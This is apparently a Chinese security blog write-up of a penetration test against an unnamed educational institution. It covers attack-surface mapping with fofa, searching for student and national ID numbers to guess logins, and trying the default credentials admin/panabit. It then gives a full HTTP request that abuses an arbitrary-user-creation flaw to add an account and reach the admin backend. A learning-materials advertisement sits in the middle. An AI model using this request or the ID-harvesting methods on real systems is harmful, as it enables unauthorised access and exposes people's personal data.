記一次某edu單位的滲透

合天网安实验室發表於2024-03-08

0x01 資訊收集

第一步當然是從資訊收集開始，因為通常主域名基本不會含有高危漏洞。可以透過子域名->子域名埠掃描的方式去進行一個資訊收集用來提高攻擊面。這裡是用fofa進行攻擊面的擴大。（如果fofa脆弱系統較少可以自己爆破子域名+埠1-65535掃描的方式去進行滲透測試）。

記一次某edu單位的滲透

然後把資產去重，可以使用關鍵詞用來尋找一些存在漏洞機率高一些的系統。比如搜尋有登入的系統，可以新增body="登入"這種關鍵字去進行查詢。比如這裡是找到了一個日誌系統。

記一次某edu單位的滲透

也可以透過googlehack進行搜尋學號，身-份證之類的資訊。可以透過學號身-份證這些資訊用來登入某些系統，大部分的學校系統的口令格式是學號/身-份證後6位。（這裡隨便找一個案例）

0x02 命令執行

可以根據通用系統的歷史漏洞去對該系統進行滲透測試。

【----幫助網安學習，以下所有學習資料免費領！加vx：dctintin，備註 “部落格園” 獲取！】

　① 網安學習成長路徑思維導圖
　② 60+網安經典常用工具包
　③ 100+SRC漏洞分析報告
　④ 150+網安攻防實戰技術電子書
　⑤ 最權威CISSP 認證考試指南+題庫
　⑥ 超1800頁CTF實戰技巧手冊
　⑦ 最新網安大廠面試題合集（含答案）
　⑧ APP客戶端安全檢測指南（安卓+IOS）

首先嚐試預設口令進行登入 admin/panabit 未果。

記一次某edu單位的滲透

然後建議百度搜尋時間設定為一年內，可以省不少時間實際測試感覺一年之前的漏洞修復機率比較高。（可能是一年一次hvv的原因？）

記一次某edu單位的滲透

也可以用微信的公眾號搜尋，比較推薦，因為準確率比較高，都是一些新出的漏洞。

記一次某edu單位的滲透

然後使用任意使用者建立漏洞新增一個使用者

POST /singleuser_action.php HTTP/1.1
Host: xxxx
Cookie: xxxx
Sec-Ch-Ua: " Not A;Brand";v="99", "Chromium";v="92"
Accept: */*
X-Requested-With: XMLHttpRequest
Sec-Ch-Ua-Mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: xxxx
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Length: 574

{ "syncInfo": { "user": { "userId": "001", "userName":
"001", "employeeId": "001", "departmentId": "001",
"departmentName": "001", "coporationId": "001",
"corporationName": "001", "userSex": "1", "userDuty": "001",
"userBirthday": "001", "userPost": "001", "userPostCode":
"001", "userAlias": "001", "userRank": "001", "userPhone":
"001", "userHomeAddress": "001", "userMobilePhone": "001",
"userMailAddress": "001", "userMSN": "001", "userNt": "001",
"userCA": "001", "userPwd": "001", "userClass": "001",
"parentId": "001", "bxlx": "001" },"operationType":
"ADD_USER" } }

成功登入後臺

記一次某edu單位的滲透